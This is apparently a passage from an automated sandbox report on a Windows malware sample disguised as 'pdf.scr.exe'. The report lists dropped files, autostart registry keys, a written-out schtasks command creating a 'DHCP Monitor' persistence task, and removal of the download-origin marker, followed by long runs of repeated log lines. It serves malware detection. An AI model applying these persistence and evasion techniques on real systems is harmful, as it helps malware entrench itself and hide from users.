      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

      Boot Survival

      barindex
      Creates multiple autostart registry keys
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Creates autostart registry keys with suspicious values (likely registry only malware)
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbsJump to behavior
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | deleteJump to behavior
      Uses an obfuscated file name to hide its real file extension (double extension)
      Source: Possible double extension: pdf.scrStatic PE information: 004349256789197.pdf.scr.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C325A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00C325A0
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
